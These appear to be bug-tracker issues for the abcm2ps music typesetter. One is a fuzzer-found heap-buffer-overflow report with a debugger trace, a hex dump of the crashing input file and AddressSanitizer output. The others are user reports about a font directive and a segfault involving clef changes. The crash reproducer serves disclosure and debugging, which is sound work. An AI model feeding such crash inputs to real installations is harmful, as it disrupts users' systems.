[#5] 0x55555559f270 → Name: svg_write(buf=0x5555557d1260 "% --- font 20.0 F2 \n/y0{-74.0 add}!\n/yns0{-74.0 add}!\n24.0 228.1 -74.0 bar \n24.0 378.0 -74.0 bar \ndlw 378.0 0.0 -74.0 M 0 RL 378.0 0.0 -68.0 M 0 RL 378.0 0.0 -62.0 M 0 RL 378.0 0.0 -56.0 M 0 RL 378.0 0.0 -50.0 M 0 RL stroke\n12.0 F0 44.7 38.4 yns0 M (A)gcshow\n134.1 38.4 yns0 M (F)gcshow\n237.8 38.4 yns0 M (G)gcshow\n337.0 38.4 yns0 M (C)gcshow\n/y{-87.0 yns0}def 13.0 F3 378.0 0 y 2 accordh", len=0x287)
[#6] 0x55555559fcdf → Name: svg_write(buf=0x5555557d1260 "% --- font 20.0 F2 \n/y0{-74.0 add}!\n/yns0{-74.0 add}!\n24.0 228.1 -74.0 bar \n24.0 378.0 -74.0 bar \ndlw 378.0 0.0 -74.0 M 0 RL 378.0 0.0 -68.0 M 0 RL 378.0 0.0 -62.0 M 0 RL 378.0 0.0 -56.0 M 0 RL 378.0 0.0 -50.0 M 0 RL stroke\n12.0 F0 44.7 38.4 yns0 M (A)gcshow\n134.1 38.4 yns0 M (F)gcshow\n237.8 38.4 yns0 M (G)gcshow\n337.0 38.4 yns0 M (C)gcshow\n/y{-87.0 yns0}def 13.0 F3 378.0 0 y 2 accordh", len=<optimized out>)
[#7] 0x5555555639eb → Name: write_buffer()
[#8] 0x555555565215 → Name: write_buffer()
[#9] 0x555555565215 → Name: block_put()

gef➤  p fontnames[0x0]
$1 = 0x5555557ddb30 "sans-serif"
gef➤  p fontnames[0x1]
$2 = 0x5555557ddb50 "serif-Italic"
gef➤  p fontnames[0x2]
$3 = 0x5555557ddb70 "serif"
gef➤  p fontnames[0x3]
$4 = 0x5555557ddb90 "serif-Bold"
gef➤  p fontnames[0x9]
$5 = 0x0
gef➤  i r
rax            0x0      0x0
rbx            0x5555557c3880   0x5555557c3880
rcx            0x0      0x0
rdx            0x5555557d1010   0x5555557d1010
rsi            0x5555557d1010   0x5555557d1010
rdi            0x0      0x0
rbp            0x0      0x0
rsp            0x7fffffffd6d8   0x7fffffffd6d8
r8             0x0      0x0
r9             0x0      0x0
r10            0x7ffff77e4cc0   0x7ffff77e4cc0
r11            0x5555555a6c41   0x5555555a6c41
r12            0x5555557d13dd   0x5555557d13dd
r13            0x5555557d13e4   0x5555557d13e4
r14            0x61     0x61
r15            0xa      0xa
rip            0x7ffff76f7646   0x7ffff76f7646 <__strlen_sse2+38>
eflags         0x10293 [ CF AF SF IF RF]
cs             0x33     0x33
ss             0x2b     0x2b
ds             0x0      0x0
es             0x0      0x0
fs             0x0      0x0
gs             0x0      0x0

Reproducer file - Reproducer

heap-buffer-overflow abcparse.c:2149 in parse_line

Reproducer: abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc.zip (SHA1: a9b2a139ef095743544fbf78fb68291ac4549f37)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b

00000000  58 3a 30 0b 0d 30 30 30  30 30 30 30 30 30 0a 4d  |X:0..000000000.M|
00000010  3a 34 2f 34 0a 30 30 30  30 30 30 30 0a 4b 3a 30  |:4/4.0000000.K:0|
00000020  0a 7c 1a 47 41 42 63 20  64 65 64 42 7c 64 65 64  |.|.GABc dedB|ded|
00000030  42 20 64 65 63 20 5e 30  30 42 7c 63 32 30 30 30  |B dec ^00B|c2000|
00000040  30 30 42 0a 7c 3a 67 36  67 66 20 5c 64 42 64 5b  |00B.|:g6gf \dBd[|
00000050  67 32 66 29 2e 65 11 64  32 30 63 32 30 63 20 73  |g2f).e.d20c20c s|
00000060  30 64 64 66 7c 0a 28 30                           |0ddf|.(0|
00000068
./abcm2ps abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:6:1: error: Bad character
   6 |GABc dedB|dedB dec ^00B|c200000B
      ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:7: error: '\' ignored
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
            ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:18: error: Not a note
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
                       ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:26: error: Not a note
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
                               ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:28: error: Not a note
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
                                 ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:31: error: Too many notes in chord
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
                                    ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:32: error: Too many notes in chord
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
                                     ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:32: error: Not a note
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
                                     ^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:12: error: Chord not closed
   7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
                 ^
=================================================================
==12611==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028ff at pc 0x55ff23ed14cd bp 0x7fffc3d7d7f0 sp 0x7fffc3d7d7e8
READ of size 1 at 0x6250000028ff thread T0
    #0 0x55ff23ed14cc in parse_line /home/hsalo/src/abcm2ps/abcparse.c:2149
    #1 0x55ff23ed14cc in abc_parse /home/hsalo/src/abcm2ps/abcparse.c:164
    #2 0x55ff23f8d010 in txt_add_eos /home/hsalo/src/abcm2ps/front.c:379
    #3 0x55ff23f8d010 in frontend /home/hsalo/src/abcm2ps/front.c:891
    #4 0x55ff23eaaf3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
    #5 0x55ff23ea72b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
    #6 0x7f2a28e7f2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
    #7 0x55ff23ea9649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)

0x6250000028ff is located 1 bytes to the left of 8192-byte region [0x625000002900,0x625000004900)
allocated by thread T0 here:
    #0 0x7f2a295c3d28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28)
    #1 0x55ff23f8a697 in txt_add /home/hsalo/src/abcm2ps/front.c:109

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hsalo/src/abcm2ps/abcparse.c:2149 in parse_line
Shadow bytes around the buggy address:
  0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
  0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12611==ABORTING

%%musicfont directive doesn't work in ver 8.14.5

Hello,
I tried the following directive at the beginning of my abc file:
%%musicfont url(../Bravura.otf)
Unfortunately the following output is processed:
[image: Out001]
Also %%musicfont Bravura didn't work. The font is installed at /usr/local/share/fonts and recognized by other programs.
By the way, I got the same output with abcjs24 and abctopdf from abc2svg:
[image: abc]
Thanks in advance,
Max
PS: abcm2ps is a great application. Thank you so much for creating such a fantastic piece of software!

Segmentation fault if clef change in polyharmonic music is between slurs

Hello,
First of all, thank you very very much for this wonderful piece of software.
I get a segmentation fault if the clef change is between slurs. See the following example of the beginning of a Brahms song:

X: 1
T: Wie bist Du, meine Königin
M: 3/8
L: 1/8
V:1
V:2 merge
V:3
K: Db
V:1
(dcB)| (gfe) | (agf) | (=abc) |
V:2
x3 | BA>c | !<(!e/A/c>d!<)! | !>(!c>BA/G/!>)! |
V:1
d2z | d'c'b | b>ae/f/ | g>fc/d/	|
V:2
F2x | d3	| x3		| x3		|
V:1
(efg | a2 =g) | [Aea]2 z | (f2 g) |
V:2
!<(!c2 c | (edB) !<)! | x3 | !<(!_c2 B |
V:1
(a2 f | g2 d) | =c2 z | d'2 a |
V:2
A3	!<)! | G2 G  | G2 z | [df]3 |
V:1
f2 z | (d'af)    | (gfe)          | (dcB) | (gfe) |
V:2
d2 z | [df]2 d | [Gc]2 [Gc] |F2 z     | BA>c
%
%
V:3 bass
[L: 1/16] z (D,,A,,D,F,A,) | z (E,,A,,C,G,A,) | z (G,,D,G,[A,,E,]A,) |
V:3
(D,,A,,D,F,A,D | [K: treble] F) (F,CDFA | c4) B2 & (EGEGDG) | A4 G2 & (CECEB,E) |

If I change the last line as follows, everything works fine:
(D,,A,,D,F,A,D | F) [K: treble] (F,CDFA | c4) B2 & (EGEGDG) | A4 G2 & (CECEB,E) |

Thanks in advance,
Max
